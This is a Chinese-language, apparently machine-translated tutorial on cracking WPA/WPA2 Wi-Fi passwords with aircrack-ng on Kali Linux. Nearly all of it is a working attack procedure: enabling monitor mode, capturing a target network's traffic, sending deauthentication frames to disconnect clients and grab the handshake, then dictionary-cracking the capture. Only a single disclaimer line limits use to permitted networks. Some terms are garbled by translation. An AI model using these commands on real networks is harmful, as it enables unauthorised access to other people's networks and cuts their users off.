"黑客上网"听起来真的很酷很有趣。但是实际上, 拥有良好的词汇表实际上可以轻松破解wifi。但是这个世界列表是没有用的, 除非我们不知道如何实际使用该单词列表来破解哈希。在破解哈希之前, 我们实际上需要生成哈希。因此, 以下是这些步骤以及一些不错的词汇表, 它们可以破解WPA/WPA2 wifi。
注意:仅在你自己的wifi上或在拥有者许可的情况下, 将以下方法用于教育/测试目的。请勿将其用于恶意目的。
因此, 启动Kali Linux。打开终端窗口。并执行以下步骤。
第1步: ifconfig(接口配置):查看或更改系统上网络接口的配置。
ifconfig
这里,
- eth0:第一个以太网接口
- l0:环回接口
- wlan0:系统上的第一个无线网络接口。 (这就是我们所需要的。)
第2步:停止当前正在使用的进程无线上网接口。
airmon-ng check kill
第三步:要在其中启动wlan0监控模式.
airmon-ng start wlan0
步骤4:要查看所有无线上网你周围的网络。
airodump-ng wlan0mon
这里,
- airodump-ng:用于数据包捕获
- wlan0mon:接口名称(此名称在不同设备上可以不同)
按Ctrl + C找到目标网络后停止该过程。
步骤5:查看连接到目标网络的客户端。
airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon
这里,
- airodump-ng:用于数据包捕获
- -c:频道
- –bssid:无线访问点的MAC地址(WAP)。
- -w:你要保存文件(密码文件)的目录。
- wlan0mon:接口名称。
步骤6:打开一个新的终端窗口以断开连接到目标网络的客户端。
aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
- aireplay-ng:注入帧
- -0:用于取消身份验证
- 10:发送的取消认证报文数
- -a:对于目标网络的bssid
- wlan0mon:接口名称。
客户端与目标网络断开连接时。他尝试重新连接到网络, 当他这样做时, 你会得到一个叫做WPA在终端的上一个窗口中握手。
现在, 我们完成了捕获数据包的工作。因此, 现在你可以关闭终端窗口。
步骤7解密密码。打开文件应用程序。
这里,
- hacking-01.cap是你需要的文件。
aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
- aircrack-ng:802.11WEP和WPA-PSK密钥破解程序
- -a:-a2为WPA2&-代表WPA网络
- -b:目标网络的BSSID
- -w:单词表文件的位置
- /root/hacking-01.cap:上限文件的位置
你可以从互联网上下载通用密码文件,如果你想创建自己的文件,那么你可以使用crunch工具:https://tools.kali.org/password-attacks/crunch